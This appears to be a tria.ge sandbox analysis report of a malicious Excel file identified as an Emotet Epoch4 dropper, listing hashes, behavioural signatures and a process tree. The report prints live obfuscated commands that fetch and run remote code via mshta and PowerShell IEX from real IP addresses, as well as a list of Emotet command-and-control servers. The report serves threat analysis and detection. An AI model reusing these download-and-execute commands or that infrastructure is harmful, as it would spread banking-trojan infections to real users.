Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

8

5427559789...83.xls

windows7_x64

10

5427559789...83.xls

windows10-2004_x64

10

Analysis

  • max time kernel
    132s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    20/01/2022, 19:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    5427559789147265183.xls

  • Size

    142KB

  • MD5

    dbec7c9243ac15b3a8a655df66c73b36

  • SHA1

    bc2363c0f1aeb0167b933b99ccfc2d26e24a795f

  • SHA256

    a2f32b5bfd78eeee7b3d4d44b4da8c8aeb98ab866a7998e2adaabc80cd1247a4

  • SHA512

    66108f0128d7d2fa1900d98c60a752699b1134b80d678754f1ad6989ab086f5c41075e598ae4e1442544731aceedf7d204a243db6209a09e9d6da28d9c256745

Score
10/10
emotetepoch4bankerpersistencetrojan

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0xb907d607/fer/fer.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.7.214.7/fer/fer.png

Extracted

Family

emotet

Botnet

Epoch4

C2

131.100.24.231:80

209.59.138.75:7080

103.8.26.103:8080

51.38.71.0:443

212.237.17.99:8080

79.172.212.216:8080

207.38.84.195:8080

104.168.155.129:8080

178.79.147.66:8080

46.55.222.11:443

103.8.26.102:8080

192.254.71.210:443

45.176.232.124:443

203.114.109.124:443

51.68.175.8:8080

58.227.42.236:80

45.142.114.231:8080

217.182.143.207:443

178.63.25.185:443

45.118.115.99:8080
eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs
    persistence
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\5427559789147265183.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1808
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2908
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:808
        • C:\Windows\system32\mshta.exe
          mshta http://0xb907d607/fer/fer.html
          3⤵
          • Blocklisted process makes network request
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2664
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fer.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3044
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3592
              • C:\Windows\SysWow64\rundll32.exe
                C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
                6⤵
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:3568
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                  7⤵
                  • Loads dropped DLL
                  • Drops file in System32 directory
                  • Suspicious use of WriteProcessMemory
                  PID:1532
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Duxncgsqgddj\tojzukzntrt.pvq",iOoroFs
                    8⤵
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:2664
                    • C:\Windows\SysWOW64\rundll32.exe
                      C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Duxncgsqgddj\tojzukzntrt.pvq",DllRegisterServer
                      9⤵
                      • Blocklisted process makes network request
                      • Loads dropped DLL
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2572
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 2664 -s 1720
            4⤵
            • Program crash
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:3692
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
      1⤵
        PID:508
      • C:\Windows\System32\WaaSMedicAgent.exe
        C:\Windows\System32\WaaSMedicAgent.exe 78b2f955afbe3b2dfcdf9dec74574b32 FHrP0mqSN0m2aVNZ/L2hQQ.0.1.0.0.0
        1⤵
        • Modifies data under HKEY_USERS
        PID:2216
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k PrintWorkflow
        1⤵
          PID:2348
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -pss -s 408 -p 2664 -ip 2664
          1⤵
          • Suspicious use of NtCreateProcessExOtherParentProcess
          • Suspicious use of WriteProcessMemory
          PID:1516

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/1532-871-0x0000000005060000-0x0000000005086000-memory.dmp

          Filesize

          152KB

          Download

        • memory/1532-869-0x0000000005000000-0x0000000005026000-memory.dmp

          Filesize

          152KB

          Download

        • memory/1532-867-0x0000000004F20000-0x0000000004F46000-memory.dmp

          Filesize

          152KB

          Download

        • memory/1532-874-0x00000000051E0000-0x0000000005206000-memory.dmp

          Filesize

          152KB

          Download

        • memory/1532-862-0x0000000004670000-0x0000000004696000-memory.dmp

          Filesize

          152KB

          Download

        • memory/1808-137-0x00007FFDDCF90000-0x00007FFDDCFA0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1808-130-0x00007FFDDF090000-0x00007FFDDF0A0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1808-916-0x00007FFDDF090000-0x00007FFDDF0A0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1808-917-0x00007FFDDF090000-0x00007FFDDF0A0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1808-918-0x00007FFDDF090000-0x00007FFDDF0A0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1808-919-0x00007FFDDF090000-0x00007FFDDF0A0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1808-138-0x00007FFDDCF90000-0x00007FFDDCFA0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1808-134-0x00007FFDDF090000-0x00007FFDDF0A0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1808-133-0x00007FFDDF090000-0x00007FFDDF0A0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1808-132-0x00007FFDDF090000-0x00007FFDDF0A0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1808-131-0x00007FFDDF090000-0x00007FFDDF0A0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2572-887-0x0000000004A10000-0x0000000004A36000-memory.dmp

          Filesize

          152KB

          Download

        • memory/2572-889-0x0000000004B20000-0x0000000004B46000-memory.dmp

          Filesize

          152KB

          Download

        • memory/2572-895-0x0000000004E10000-0x0000000004E36000-memory.dmp

          Filesize

          152KB

          Download

        • memory/2572-879-0x00000000040C0000-0x00000000040E6000-memory.dmp

          Filesize

          152KB

          Download

        • memory/2572-883-0x00000000048C0000-0x00000000048E6000-memory.dmp

          Filesize

          152KB

          Download

        • memory/2572-885-0x0000000004920000-0x0000000004946000-memory.dmp

          Filesize

          152KB

          Download

        • memory/2572-893-0x0000000004D30000-0x0000000004D56000-memory.dmp

          Filesize

          152KB

          Download

        • memory/2572-891-0x0000000004C40000-0x0000000004C66000-memory.dmp

          Filesize

          152KB

          Download

        • memory/2664-876-0x00000000046A0000-0x00000000046C6000-memory.dmp

          Filesize

          152KB

          Download

        • memory/3044-856-0x00000276E8206000-0x00000276E8208000-memory.dmp

          Filesize

          8KB

          Download

        • memory/3044-864-0x00000276E87B0000-0x00000276E8826000-memory.dmp

          Filesize

          472KB

          Download

        • memory/3044-855-0x00000276E8760000-0x00000276E87A4000-memory.dmp

          Filesize

          272KB

          Download

        • memory/3044-852-0x00000276E8203000-0x00000276E8205000-memory.dmp

          Filesize

          8KB

          Download

        • memory/3044-851-0x00000276E8200000-0x00000276E8202000-memory.dmp

          Filesize

          8KB

          Download

        • memory/3044-850-0x00000276E81B0000-0x00000276E81D2000-memory.dmp

          Filesize

          136KB

          Download